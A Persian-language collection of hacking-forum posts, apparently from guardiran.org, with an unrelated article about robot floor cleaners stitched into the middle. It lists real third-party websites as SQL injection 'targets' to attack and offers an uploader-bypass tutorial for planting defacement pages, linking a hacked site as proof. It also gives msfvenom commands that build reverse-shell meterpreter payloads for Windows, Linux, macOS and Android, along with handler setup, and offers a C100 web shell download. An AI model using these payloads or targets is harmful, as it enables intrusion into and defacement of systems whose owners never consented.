جستجو در تالارهای گفتگو

برای تمرین باگ Sql Injection و برای اینکه کلی وقتتون جهت پیدا کردن باگ آسیب پذیر گرفته نشه در هر بخش چندین تارگت برای تمرین و نفوذ و هک سایت با باگ Sql Injection ( Hacking Web Application Sql Injection ) را برای شما قرار میدم . اسپم ندین و سوالات رو تنها در این بخش مطرح کنید . مجددا تکرار می کنم از قرار دادن سایتهای ایرانی خودداری فرمایید www.c2-europe.eu/news-full.php?id=1049 www.c2-deutschland.de/news-full.php?id=287 www.p5n.net/mtl/news-full.php?id=14 http://www.formsintl.com/news-full.php?id=14 موفق باشین

با سلام خدمت دوستان عزیز امروز با سیستم عامل جدیدی آشنا شدیم به نام Parrot 3.9 GNU/Linux (کلمه Parrot یعنی طوطی) که یک پلتفرم مبتنی بر Debian هست. این سیستم عامل، ابزار حرفه ای برای تست نفوذ، توسعه نرم افزار و حفاظت از حریم خصوصی رو در خودش جا داده و میشه گفت که یک توزیع مربوط به هک اخلاقی (Ethical Hacking) و تست نفوذ با ویژگی های جدید می باشد: لینک ها: صفحه اصلی انجمن پروت دانلود توی صفحه دانلود با سه نوع مختلفی از بیلد های سیستم عامل مواجه می شید که بطور خلاصه دربارش توضیح میدم: یک : Full (security) mode : نسخه فول این سیستم عامل بقول سازنده یک محیط جامع در خصوص تست نفوذ، حریم خصوصی، مهندسی معکوس، توسعه نرم افزار، جمع اوری اطلاعات و غیره هست. نسخه های 32 بین و 64 بیت با فرمت ISO در صفحه دانلود موجود هست. دو: Lite (Home/Workstation) mode : این بیلد نسخه ی سبک سیستم عامل برای استفاده روزانه و حفاظت از حریم خصوصی منتشر شده و بیشتر مدنظر کاربران عادی خواهد بود. در صفحه دانلود جدول مقایسه ای ویژگی های نسخ مختلف این سیستم عامل رو میتونید ببینید.تصاویری از سیستم عامل:

با سلام آموزش تصویری کار با اسکنر قدرتمند Vega رو در کالی لینوکس برای شما ضبط کردم و فیلم بهمراه توضیحات هست و از این اسکنر برای اسکن آسیب پذیری تارگت( ُScanner Target Vulnerability ) می تونید استفاده کنید .این اسکنر یکی از بهترین اسکنر های رایکان برای تشخیص اسیب پذیری های شناخته شده هست و 100 در 100 به افزایش امنیت سایت های شما کمک میکنه.... امیدوارم که از این اموزش نهایت استفاده رو ببرید پسورد : guardiran.org VEGA Scanner Kali Linux.rar

درود ../ با آموزش بایپس انواع آپلودر در خدمتتون هستیم در این روش ما دیفیس پیج خودمون رو به سادگی آپلود میکنیم خیلی از سرویس دهندگان آپلودر این باگ رو دارن باگ توسط اعضای تیم امنیتی گارد ایران کشف شده (MR.IMAN , Reza.Attacker , 1TED) کلیپ در دو پارت تقسیم بندی شده رمز فایل فشرده: guardiran.org لینک اثبات یکی از سایت های هک شده با این روش http://aljyyosh.org/mirror.php?id=171298 یا حـ ـق ../ 22-07-2016 01-21-51 ب-ظ.part1.rar 22-07-2016 01-21-51 ب-ظ.part2.rar

سلام هک سیستم عامل ها از طریق کالی کد ها: ویندوز: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip khodetoon> LPORT=<porti k forward kardin> -f exe > 504w.exe لینوکس: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip khodetoon> LPORT=<port> -f elf > 504w.elf مک: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip khodetoon> LPORT=<Your Port to Connect On> -f macho > 504w.macho اندروید: msfvenom -p android/meterpreter/reverse_tcp LHOST=ip khodetoon R >/root/504w.apk مناسب با تارگتتون کد رو انتخاب کنین و در اخر هندلر ها رو تنظیم کنین use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit

پنج روبات نظافتچی که خانه دار ها را شيفته خود مي کنند اين خبر مخصوص آنهايي است که هر روز مجبورهستند خانه خود را نظافت کنند.يکي از سخت ترين و عذاب‌آورترین کارهاي خانه بدون شک تميز کردن کف آن است.این کار برای بانوان بسیار سخت است زیرا با کمردرد و خستگی زیاد همراه است ولی در ادامه به معرفی پنج روبات نظافتچی که خانم‌ها عاشق آن‌ها خواهند شد خواهیم پرداخت. این دستگاه‌ها دارای قیمت‌های متنوع و خدمات متفاوتی هستند ولی وجهه مشترک همه آن‌ها، هوشمند بودن ابزار و قدرت بالای نظافت آن‌هاست. این دستگاه‌ها همگی قابلیت تمیز کردن سطوح صاف را دارند و بر اساس مدل، می‌توانند سطوح مختلفی را تمیز نمایند و همین امر موجب شده است تا کاربری آن‌ها برای افراد و مکان‌های مختلف، متنوع باشد. این دستگاه‌ها قیمت‌های متنوعی دارند و از 250 تا 600 دلار، قیمت داشته باشند و همین امر انتخاب را برای افراد مختلف، ساده خواهد نمود، البته به آقایان پیشنهادی می‌کنیم که اجازه ندهند همسرانشان این مقاله را مطالعه نمایند. این دستگاه‌ها همگی از منبع تغذیه داخلی استفاده می‌کنند و با کمک باتری به کار کردن ادامه می‌دهند و همین امر نزی موجب آزادی عمل آن‌ها خواهد شد. این دستگاه‌ها به‌سادگی می‌توانند مسیر حرکتی خود را بیابند و در میان اشیاء مختلف موجود در خانه مانور داده و گوشه‌ و کنارهای خانه را تمیز نمایند. حتی در برخی موارد، این دستگاه‌ها قابلیت تنظیم زمان‌بندی دارند و در زمان خاصی می‌توانند به‌طور خودکار شروع به کار کردن و نظافت کنند. iRobot Braava 380t این مدل با قیمت 300 دلاری خود، شاید بهترین گزینه ممکن دز این لیست باشد و شاید بتوان آن را دقیق‌ترین دستگاه میان تمامی مدل‌های موجود در بازار دانست. این مدل می‌تواند تقریبا تمامی اشغال‌های موجود بر روی زمین را جمع‌آوری نماید و به همین دلیل نیز داشتن این دستگاه کاملا به‌صرفه به نظر می‌رسد. این دستگاه در رده قیمتی و قدرتی، وسوسه‌برانگیزترین دستگاه موجود در بازار به نظر می‌رسد. البته معایبی نیز در این دستگاه وجود دارد که می‌توان مهم‌ترین آن‌ها را عدم امکان برنامه‌ریزی دستگاه برای کارکرد اتوماتیک دانست. iRobot Scooba 450 در حالی که بیشتر مدل‌های موجود در میان تمیزکنندگان زمین، برای فعالیت‌های سبک طراحی‌شده‌اند، می‌توان این مدل را به‌عنوان یک استثنا به‌حساب آورد زیرا این دستگاه به‌خوبی می‌تواند محیط‌های بسیار کثیف و زمین‌ پر از آشغال را تمیز کند. البته این امکانات، هزینه بالایی نیز خواهد داشت و برای خرید آن باید بین نزدیک به 600 دلار هزینه نمایید. از معایب این مدل نیز می‌توان به مدت کارکرد باتری آن اشاره نمود که با دو ساعت شارژ شدن، تنها می‌تواند به مدت 40 دقیقه به کار کردن ادامه بدهد. Moneual Rydis H67 این دستگاه 400 دلاری می‌تواند به تمامی گوشه و کنارهای خانه شما سر بزند و طراحی آن نیز به نحوی انجام‌شده است که با دیدن آن، حس نخواهید کرد که یک محصول عجیب در وسط خانه قرار گرفته است، شاید بتوان این طراحی را بسیار شبیه به دیسکمن‌های قدیمی دانست، البته در ابعادی به‌مراتب بزرگ‌تر. این مدل به صورتی طراحی‌شده است که می‌تواند در محیط‌ها و سطوح مختلف، به‌خوبی کار کند و به همین دلیل نیز کاربرد آن، برای شرکت‌ها و خانه‌ها به یک اندازه مفید خواهد بود. البته معایب این دستگاه نیز قابل‌چشم‌پوشی نیستند، این مدل در بسیاری از موارد با گیرکردن برس تمیزکننده در طول کار روبرو می‌شود و شاید بتوان قیمت آن را نیز کمی بالاتر از سطح معمول برای دستگاه‌های این‌چنینی محسوب نمود. Techko Maid Smart Maid RS118 شاید بتوان این مدل را با توجه به محاسبه قیمت، به‌عنوان یکی از مولفه‌های موثر در ارزش‌گذاری، یکی از برترین‌های جهان محسوب نمود، این دستگاه با توانایی‌های متعدد خود می‌تواند برای هر خانه و اداره‌ای یک گزینه ایده آل محسوب گردد، قیمت این مدل در بازار جهانی برابر با 148 دلار برای مدل پایه و 250 دلار برای پیشرفته‌ترین مدل است. از مزایای این دستگاه می‌توان به ساده بودن کار کردن با رابط کاربری آن اشاره نمود، این دستگاه را می‌توان خیلی راحت برنامه‌ریزی کرد و همین امر کارکرد خانگی آن را قوت بخشیده است. همچنین می‌توان به طراحی ویژه عملکرد دستگاه اشاره نمود که در دو نوع کارکرد، قابل برنامه‌ریزی است که برای محیط‌های مختلف قابل‌استفاده است و نوع کارکرد برس تمیزکننده را بر اساس سطحی که قرار است تمیز کند، تغییر خواهد داد. Yujin Robot iClebo Arte این ابزار مفید می‌تواند کمک بزرگی به نظافت خانه باشد، این دستگاه که از طراحی بسیار زیبایی نیز بهره‌ می‌برد، می‌تواند در هر خانه و محیط کاری مفید باشد ولی در موارد مصرف این دستگاه، تعدادی از کاربران به بد بودن کیفیت تعدادی از دستگاه‌های تولیدشده اشاره کرده‌اند که می‌تواند یک نکته منفی درباره این محصول به‌حساب بیاید ولی در زمینه‌های دیگر باید گفت که این دستگاه مزایای فراوانی نیز دارد. Yujin Robot iClebo Arte، بسیار بی‌صدا عمل می‌کند و همین امر را شایید بتوان بزرگ‌ترین مزیت آن دانست، همچنین می‌توان از این دستگاه در سطوح مختلف استفاده نمود و این محصول 500 دلاری می‌تواند یکی از گزینه‌های مطلوب برای اداره‌ها محسوب شود.

با سلام و درود یک مقاله با عنوان : هک رو از کجا شروع کنم؟ تو این مقاله یادمیگیرید که هک چیه ؟ و هک رو از کجا شروع کنید و .... مقاله رو ببینید ! امیدوارم خوشتون بیاد موفق و پیروز باشید start-hacking.pdf

Shell C100 پسورد فایل : guardiran.org . C100 Shell.rar

DOS Attack متداول ترین و مشهورترین نوع حملات Dos ، زمانی تحقق می یابد که یک مهاجم اقدام به ایجاد یک سیلاب اطلاعاتی می کند و وقتی که دیتای زیادی درشبکه درحال انتقال می باشد امکان حمله داس بیشتر خواهد شد . زمانی که شما آدرس URL یک وب سایت خاص را ا زطریق مرور گر خود تایپ می نمایید درخواست شما برای سرویس دهنده ارسال می گردد و سرویس دهنده هرلحظه قادربه پاسخگویی به حجم محدودی از درخواست ها می باشد ، بنابراین اگریک مهاجم با ارسال درخواستهای متعدد و سیلاب گونه باعث افزایش حجم عملیات سرویس دهنده گردد ، قطعا امکان پردازش درخواست شما برای سرویس دهنده وجود نخواهد داشت . حملات فوق از نوع DOS می باشند ، چرا که امکان دستیابی شما به سایت مورد نظر سلب شده است و یک مهاجم می تواند با ارسال پیام های الکتریکی ناخواسته که ازآن با نام Spam یاد می شود حملات مشابهی رامتوجه سرویس دهنده پست الکترونیک نماید. هر account پست الکترونیک (صرف نظر از منبعی که آنان را دراختیارشما قرارمی دهد، نظیر سازمان مربوطه ویا سرویسهای رایگانی نظیر یاهو دارای ظرفیت محدودی می باشند) پس از تکمیل ظرفیت فوق ، عملا " امکان ارسال Email دیگری به account فوق وجود نخواهد داشت و مهاجمان با ارسال نامه های الکترونیکی ناخواسته سعی می نمایند که ظرفیت account مورد نظر را تکمیل و عملا" امکان دریافت email های معتبر را از account فوق سلب نمایند . حملات Dos هزینه بالایی دارند و این حملات می توانند از یک شبکه محلی یا از بیرون شبکه شروع شوند و نیز یک حمله Dos را از طریق تلاش آشکار حمله کننده برای جلوگیری از استفاده کاربران قانونی یک سرویس از آن سرویس ، شناسایی می کنند. ازجمله این تلاش ها می توان به موارد زیر اشاره کرد: * انواع طغیانهای شبکه شامل طغیان های TCP , UDP : وICMP که ترافیک قانونی سایت را مختل می کند. * تلاش در جهت قطع ارتباط دو ماشین ودر نتیجه عدم امکان استفاده ازسرویس آنها. * تلاش در جهت ممانعت از دسترسی فردی خاص به یک سرویس . * تلاش برای خرابکاری در ارائه سرویس به سیستم یا شخص خاصی. از دیدگاه فنی ، حملات DOS به دو دسته زیر تقسیم می شوند : ** حمله ای که مستقیما منجر به توقف سرویس های ماشین می شود . ** حمله ای که منجر به اشباع یک سرویس دهنده و تلف شدن منابع آن شود. .